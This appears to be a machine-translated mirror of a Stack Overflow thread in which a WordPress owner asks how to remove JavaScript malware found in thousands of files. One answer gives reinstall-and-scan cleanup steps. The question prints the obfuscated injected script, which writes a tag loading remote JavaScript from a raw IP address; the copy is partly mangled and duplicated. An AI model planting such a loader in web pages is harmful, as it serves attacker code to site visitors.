Wordpress 感染了恶意软件 - _0xaae8

Posted 2023-03-04

【中文标题】Wordpress 感染了恶意软件 - _0xaae8

【英文标题】：Wordpress Infected with malware - _0xaae8

【发布时间】：2018-06-16 12:32:12

【问题描述】：

我最近发现我的网站感染了 js 恶意软件。 通过搜索，有 3240 个文件被此脚本感染。

只是想问你们如何使用 SSH 使用此脚本删除这些受感染的文件

这是恶意脚本：

块引用

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74" ,"\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E \x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74 \x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document_0xaae8[5]var _0xaae8 =["","\x6A\x6F\x69\x6E", "\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\ x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\ x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69 \x74\x65"];document_0xaae8[5]/**

块引用

提前致谢！

【参考方案1】：

下载您的 wp-content 文件夹和数据库，删除您当前的 wordpress 安装并安装 wordpress 的新副本，

从下载的 wp-content 中删除所有未使用的主题和插件，并使用您的防病毒软件或使用https://www.virustotal.com/ 或您的 linux 操作系统中的任何防病毒软件（如果您使用的是 linux）扫描该文件夹和数据库

如果你也删除所有插件并从 wordpress 插件仓库重新安装一个新副本会更好，所以你只需要扫描当前正在使用的主题和数据库，如果你有足够的时间，你可以挖掘在主题文件上，以确保不再有恶意代码。

重新上传数据库并从旧安装的扫描 wp-content 中替换新安装的 wp-content。

【讨论】：

谢谢！但我正在考虑一种方法，比如通过搜索关键字 _0xaae8 直接通过 SSH 删除文件 - 不幸的是我对正则表达式不太熟悉 :(